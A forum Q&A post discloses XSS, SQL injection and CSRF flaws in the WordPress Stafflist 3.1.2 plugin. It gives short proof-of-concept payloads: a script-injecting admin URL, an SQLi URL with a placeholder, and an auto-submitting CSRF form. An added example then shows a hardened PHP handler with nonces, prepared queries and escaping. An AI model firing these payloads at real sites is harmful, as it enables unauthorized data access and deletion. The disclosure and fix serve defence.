0 votes
WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability
by (277 points)

1 Answer

0 votes

WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&search=[SQLI]

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

POC:

<html>
  <body>
    <form action="http://localhost/wp-admin/admin.php">
      <input type="hidden" name="page" value="stafflist" />
      <input type="hidden" name="remove" value="1" />
      <input type="hidden" name="p" value="1" />
      <input type="hidden" name="s" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

by (277 points)
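
For plugin maintainers and reviewers, the following added example (not part of the answer above and not the Stafflist plugin's own code) shows how a WordPress admin-page handler can treat the `p`, `search` and `remove` parameters from the three PoCs safely. The function name, nonce action, table and column names are assumptions made for illustration.

```php
<?php
// Added example: hypothetical admin-page handler, not the Stafflist plugin's code.
// Assumed names: example_stafflist_page(), nonce action 'example_stafflist_remove',
// table {$wpdb->prefix}example_stafflist with columns id, firstname, lastname.
function example_stafflist_page() {
    global $wpdb;
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $table = $wpdb->prefix . 'example_stafflist';

    // Typed input: the page number can only ever be a non-negative integer.
    $paged  = isset( $_REQUEST['p'] ) ? absint( $_REQUEST['p'] ) : 1;
    $search = isset( $_GET['search'] ) ? sanitize_text_field( wp_unslash( $_GET['search'] ) ) : '';

    // CSRF: deletion is accepted only as a POST carrying a valid nonce.
    if ( 'POST' === $_SERVER['REQUEST_METHOD'] && isset( $_POST['remove'] ) ) {
        check_admin_referer( 'example_stafflist_remove' ); // dies on a missing or bad nonce
        $wpdb->delete( $table, array( 'id' => absint( $_POST['remove'] ) ), array( '%d' ) );
    }

    // SQL injection: the search term is bound as a parameter, LIKE wildcards escaped.
    $like = '%' . $wpdb->esc_like( $search ) . '%';
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, firstname, lastname FROM {$table} WHERE lastname LIKE %s ORDER BY id LIMIT %d, 20",
            $like,
            max( 0, $paged - 1 ) * 20
        )
    );

    // XSS: every value echoed into HTML is escaped for its output context.
    echo '<form method="get"><input type="hidden" name="page" value="stafflist" />';
    echo '<input type="hidden" name="p" value="' . esc_attr( $paged ) . '" />';
    echo '<input type="search" name="search" value="' . esc_attr( $search ) . '" /></form>';

    foreach ( $rows as $row ) {
        echo '<form method="post">';
        wp_nonce_field( 'example_stafflist_remove' ); // emits the _wpnonce hidden field
        echo '<input type="hidden" name="remove" value="' . esc_attr( $row->id ) . '" />';
        echo esc_html( $row->firstname . ' ' . $row->lastname );
        echo ' <input type="submit" value="Remove" /></form>';
    }
}
```

With this shape, the cross-site form in the CSRF PoC is rejected because it carries no nonce, the payload in `p` is reduced to an integer before it is echoed, and the `search` value never becomes part of the SQL text.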